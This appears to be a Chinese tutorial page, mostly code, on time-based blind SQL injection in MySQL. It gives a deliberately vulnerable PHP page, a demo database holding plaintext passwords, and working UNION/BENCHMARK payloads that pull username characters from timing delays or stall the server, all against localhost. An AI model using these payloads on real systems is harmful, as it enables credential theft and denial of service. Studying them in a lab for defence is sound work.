第一部
1
2
3
4
5
6
7
|
mysql> select BENCHMARK(1000000,encode(“hello”,“goodbye”));
+–––––––––––––––––––––––+
| BENCHMARK(1000000,encode(“hello”,“goodbye”)) |
+–––––––––––––––––––––––+
| 0 |
+–––––––––––––––––––––––+
1 row in set (4.74 sec)
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
mysql> select md5( ‘test’ );
+–––––––––––––––––+
| md5( ‘test’ ) |
+–––––––––––––––––+
| 098f6bcd4621d373cade4e832627b4f6 |
+–––––––––––––––––+
1 row in set (0.00 sec) 〈–––––-执行时间为0.00 sec
mysql> select benchmark( 500000, md5( ‘test’ ) );
+––––––––––––––––––+
| benchmark( 500000, md5( ‘test’ ) ) |
+––––––––––––––––––+
| 0 |
+––––––––––––––––––+
1 row in set (6.55 sec) 〈––––––执行时间为6.55 sec
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
< ?php
$servername = “localhost”;
$dbusername = “root”;
$dbpassword = “”;
$dbname = “injection”;
mysql_connect($servername,$dbusername,$dbpassword) or die (“数据库连接失败”);
$sql = “SELECT * FROM article WHERE articleid=$id”;
$result = mysql_db_query($dbname,$sql);
$row = mysql_fetch_array($result);
if (!$row)
{
exit;
}
?>
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
# 数据库 : `injection`
#
# ——————————————————–
#
# 表的结构 `article`
#
CREATE TABLE `article` (
`articleid` int(11) NOT NULL auto_increment,
`title` varchar(100) NOT NULL default ”,
`content` text NOT NULL,
PRIMARY KEY (`articleid`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
#
# 导出表中的数据 `article`
#
INSERT INTO `article` VALUES (1, ‘我是一个不爱读书的孩子’, ‘中国的教育制度真是他妈的落后!如果我当教育部长。我要把所有老师都解雇!操~’);
INSERT INTO `article` VALUES (2, ‘我恨死你’, ‘我恨死你了,你是什么东西啊’);
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
#
# 表的结构 `user`
#
CREATE TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default ”,
`password` varchar(20) NOT NULL default ”,
PRIMARY KEY (`userid`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;
#
# 导出表中的数据 `user`
#
INSERT INTO `user` VALUES (1, ‘angel’, ‘mypass’);
INSERT INTO `user` VALUES (2, ’4ngel’, ‘mypass2′);
|
1
|
id=1 union select 1,benchmark(500000,md5(‘test’)),1 from user where userid=1 and ord(substring(username,1,1))=97 /*
|
1
|
http://127.0.0.1/test/test/show.php?id=1%20union%20select%201,benchmark(500000,md5(0×41)),1%20from%20user%20where%20userid=1%20and%20ord(substring(username,1,1))=97%20/*
|
1
|
http://127.0.0.1/test/test/show.php?id=1%20union%20select%201,1,benchmark(99999999,md5(0×41))
|
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号